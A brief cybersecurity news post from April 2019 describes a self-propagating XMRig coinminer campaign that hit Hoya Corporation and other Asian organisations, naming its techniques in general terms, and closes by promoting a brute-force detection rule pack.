Delaware, USA – April 15, 2019 – Despite the fall of the Monero cryptocurrency and the closure of Coinhive platform, adversaries do not lose interest in coinminers and continue to modify them to attack organizations. Last week it became known about the attack of sophisticated coinminer on Hoya Corporation which caused about 40% drop in production. After analyzing the malware, researchers from Trend Micro discovered that it was also used in attacks on organizations in Australia, India, Taiwan, Vietnam, and Hong Kong. The first campaign using this coinminer was targeted at China this January, but within a couple of months, cybercriminals expanded the capabilities of propagation and infection and launched a new campaign. The discovered strain uses PowerShell scripts for invisible penetration and gaining a foothold in the system, and it also creates a scheduled task to download a fresh copy of the malware. The primary method of spreading over the network after the initial compromise is a dictionary attack using a list of weak credentials. In addition, the malware is armed with the EternalBlue exploit and a PowerShell implementation of Mimikatz tool.
The adversaries managed to create sophisticated self-propagating malware, the main purpose of which is to install XMRig on as many systems as possible in the organization’s network. The first successful attempts to add to cryptocurrency miner the ability to spread within the network using EternalBlue exploit occurred almost a year and a half ago, but recently spotted combination of tools for self-propagation with PowerShell abusing is much more dangerous. To detect such attacks in the early stages before they cause significant damage to the organization, you can use Brute Force Detection rule pack which determines the unauthorized access attempts using various brute force techniques: https://my.socprime.com/en/integrations/brute-force-detection-hpe-arcsight